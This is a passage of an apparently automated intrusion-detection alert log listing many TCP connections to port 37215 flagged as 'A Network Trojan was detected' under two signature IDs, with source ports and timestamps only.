                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.907657
                  SID:2829579
                  Source Port:55098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.672315
                  SID:2829579
                  Source Port:42966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.300900
                  SID:2835222
                  Source Port:47810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.591446
                  SID:2829579
                  Source Port:57174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.790493
                  SID:2829579
                  Source Port:32808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.605187
                  SID:2835222
                  Source Port:43982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.130365
                  SID:2835222
                  Source Port:38528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.562679
                  SID:2835222
                  Source Port:55278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.165580
                  SID:2835222
                  Source Port:52818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.413827
                  SID:2835222
                  Source Port:54956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.810780
                  SID:2829579
                  Source Port:52498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.761940
                  SID:2829579
                  Source Port:40344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.657742
                  SID:2835222
                  Source Port:46392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.302644
                  SID:2835222
                  Source Port:58934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.619172
                  SID:2829579
                  Source Port:33758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.470099
                  SID:2829579
                  Source Port:38442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.661744
                  SID:2835222
                  Source Port:60158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.917896
                  SID:2829579
                  Source Port:47486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.859325
                  SID:2835222
                  Source Port:49298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.080218
                  SID:2835222
                  Source Port:51340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.918271
                  SID:2829579
                  Source Port:42268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.017711
                  SID:2835222
                  Source Port:44268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.849427
                  SID:2835222
                  Source Port:58522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.868019
                  SID:2829579
                  Source Port:47868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.133691
                  SID:2835222
                  Source Port:35466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.555849
                  SID:2829579
                  Source Port:49900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.001576
                  SID:2829579
                  Source Port:50422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.313127
                  SID:2829579
                  Source Port:34548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.648560
                  SID:2829579
                  Source Port:36088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.990229
                  SID:2829579
                  Source Port:55788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.074173
                  SID:2835222
                  Source Port:46796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.784387
                  SID:2829579
                  Source Port:48878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.346095
                  SID:2835222
                  Source Port:46080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.492414
                  SID:2829579
                  Source Port:43614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.514091
                  SID:2835222
                  Source Port:46882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.347149
                  SID:2829579
                  Source Port:50964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.668582
                  SID:2835222
                  Source Port:39880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.857998
                  SID:2835222
                  Source Port:37286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.340095
                  SID:2829579
                  Source Port:60604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.144044
                  SID:2829579
                  Source Port:58568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.978866
                  SID:2829579
                  Source Port:45728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.353550
                  SID:2829579
                  Source Port:46264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.631742
                  SID:2829579
                  Source Port:54208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.322732
                  SID:2835222
                  Source Port:53116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.592095
                  SID:2829579
                  Source Port:50426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.575618
                  SID:2835222
                  Source Port:58200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.174460
                  SID:2835222
                  Source Port:43708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.953647
                  SID:2835222
                  Source Port:32828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.217883
                  SID:2829579
                  Source Port:47790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.143862
                  SID:2835222
                  Source Port:49612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.502478
                  SID:2835222
                  Source Port:39100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.242772
                  SID:2829579
                  Source Port:48886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.858543
                  SID:2829579
                  Source Port:57876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.974883
                  SID:2835222
                  Source Port:54774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.398717
                  SID:2829579
                  Source Port:53090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.622607
                  SID:2829579
                  Source Port:46570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.878894
                  SID:2835222
                  Source Port:55810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.828950
                  SID:2829579
                  Source Port:51560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.831755
                  SID:2835222
                  Source Port:48614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.211472
                  SID:2835222
                  Source Port:55898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.902162
                  SID:2829579
                  Source Port:37994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.602655
                  SID:2835222
                  Source Port:45534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.822021
                  SID:2829579
                  Source Port:58756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.443386
                  SID:2829579
                  Source Port:41870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.658066
                  SID:2835222
                  Source Port:58228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.525372
                  SID:2829579
                  Source Port:40410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.956245
                  SID:2835222
                  Source Port:52330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.486715
                  SID:2829579
                  Source Port:47602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.196604
                  SID:2835222
                  Source Port:55274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.181070
                  SID:2829579
                  Source Port:58838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.286417
                  SID:2829579
                  Source Port:42606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.219049
                  SID:2835222
                  Source Port:52960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.795312
                  SID:2835222
                  Source Port:51322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.550771
                  SID:2829579
                  Source Port:33964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.005995
                  SID:2829579
                  Source Port:37338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.804667
                  SID:2829579
                  Source Port:59448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.373909
                  SID:2829579
                  Source Port:41180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.264063
                  SID:2835222
                  Source Port:49588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.126065
                  SID:2835222
                  Source Port:35728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.007312
                  SID:2835222
                  Source Port:34002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.539034
                  SID:2829579
                  Source Port:38578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.997408
                  SID:2835222
                  Source Port:53742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.964382
                  SID:2829579
                  Source Port:49112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.816598
                  SID:2829579
                  Source Port:57338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.297607
                  SID:2835222
                  Source Port:54326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.920936
                  SID:2829579
                  Source Port:44690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.558388
                  SID:2829579
                  Source Port:56164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.603394
                  SID:2835222
                  Source Port:53212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.714362
                  SID:2835222
                  Source Port:55050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.013937
                  SID:2829579
                  Source Port:48344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.078993
                  SID:2835222
                  Source Port:41730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.298145
                  SID:2835222
                  Source Port:60976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.612817
                  SID:2835222
                  Source Port:38146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.690797
                  SID:2829579
                  Source Port:40674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.808084
                  SID:2835222
                  Source Port:34782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.498447
                  SID:2829579
                  Source Port:34290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.309217
                  SID:2835222
                  Source Port:51140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.794685
                  SID:2829579
                  Source Port:33550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.876942
                  SID:2835222
                  Source Port:33562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.543702
                  SID:2829579
                  Source Port:55360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.761894
                  SID:2829579
                  Source Port:58998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.192940
                  SID:2829579
                  Source Port:60456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.522435
                  SID:2829579
                  Source Port:51926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.761850
                  SID:2835222
                  Source Port:51460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.876445
                  SID:2829579
                  Source Port:50746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.612875
                  SID:2829579
                  Source Port:36840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.115626
                  SID:2829579
                  Source Port:46440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.486593
                  SID:2835222
                  Source Port:50214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.808403
                  SID:2835222
                  Source Port:51896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.888745
                  SID:2835222
                  Source Port:37356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.182114
                  SID:2835222
                  Source Port:45902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.308740
                  SID:2835222
                  Source Port:40228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.761946
                  SID:2835222
                  Source Port:55602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.183649
                  SID:2835222
                  Source Port:54684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.110610
                  SID:2829579
                  Source Port:50686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.759873
                  SID:2835222
                  Source Port:46020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.881227
                  SID:2835222
                  Source Port:55988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.924375
                  SID:2829579
                  Source Port:54356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.593100
                  SID:2835222
                  Source Port:34506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.765142
                  SID:2835222
                  Source Port:44004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.932722
                  SID:2829579
                  Source Port:41572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.568128
                  SID:2835222
                  Source Port:40242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.750468
                  SID:2829579
                  Source Port:47458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.448133
                  SID:2829579
                  Source Port:46524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.546157
                  SID:2829579
                  Source Port:38722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.209282
                  SID:2829579
                  Source Port:39748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.642670
                  SID:2829579
                  Source Port:35768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.176375
                  SID:2835222
                  Source Port:40368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.069901
                  SID:2829579
                  Source Port:34162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.102730
                  SID:2829579
                  Source Port:42688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.763927
                  SID:2835222
                  Source Port:45568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.268531
                  SID:2829579
                  Source Port:43164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.055753
                  SID:2829579
                  Source Port:49888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.190530
                  SID:2835222
                  Source Port:55294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.865375
                  SID:2835222
                  Source Port:47370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.359081
                  SID:2829579
                  Source Port:34884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.252129
                  SID:2835222
                  Source Port:35850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.584123
                  SID:2829579
                  Source Port:48070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.776832
                  SID:2835222
                  Source Port:49138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.187450
                  SID:2835222
                  Source Port:33390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.000595
                  SID:2829579
                  Source Port:44852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.581660
                  SID:2829579
                  Source Port:34368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.890011
                  SID:2835222
                  Source Port:48362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.520739
                  SID:2835222
                  Source Port:42084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.979211
                  SID:2829579
                  Source Port:53222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.253799
                  SID:2829579
                  Source Port:49514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.511633
                  SID:2829579
                  Source Port:59684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.983078
                  SID:2835222
                  Source Port:35048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.003273
                  SID:2835222
                  Source Port:40794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.752380
                  SID:2835222
                  Source Port:53070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.800250
                  SID:2829579
                  Source Port:46046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.527707
                  SID:2829579
                  Source Port:39568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.974355
                  SID:2829579
                  Source Port:57832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.802348
                  SID:2829579
                  Source Port:39884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.976557
                  SID:2835222
                  Source Port:60058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.937591
                  SID:2835222
                  Source Port:49054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.828801
                  SID:2835222
                  Source Port:44720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.383714
                  SID:2835222
                  Source Port:57076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.282645
                  SID:2829579
                  Source Port:46916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.201699
                  SID:2835222
                  Source Port:50080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.893458
                  SID:2829579
                  Source Port:39468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.238567
                  SID:2829579
                  Source Port:34334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.979400
                  SID:2829579
                  Source Port:57204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.639187
                  SID:2835222
                  Source Port:44612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.907934
                  SID:2829579
                  Source Port:57226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.287568
                  SID:2829579
                  Source Port:50810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.477524
                  SID:2835222
                  Source Port:49460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.655197
                  SID:2835222
                  Source Port:58632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.547340
                  SID:2829579
                  Source Port:35688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.836980
                  SID:2835222
                  Source Port:35226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.883057
                  SID:2835222
                  Source Port:60940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.811589
                  SID:2835222
                  Source Port:37882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.473922
                  SID:2829579
                  Source Port:52964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.633994
                  SID:2835222
                  Source Port:40536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.912225
                  SID:2835222
                  Source Port:39584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.248945
                  SID:2835222
                  Source Port:39314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.584785
                  SID:2835222
                  Source Port:60300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.156506
                  SID:2829579
                  Source Port:57646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.381713
                  SID:2835222
                  Source Port:40038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.361334
                  SID:2829579
                  Source Port:33832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.479791
                  SID:2835222
                  Source Port:58178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.811368
                  SID:2835222
                  Source Port:47274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.603262
                  SID:2829579
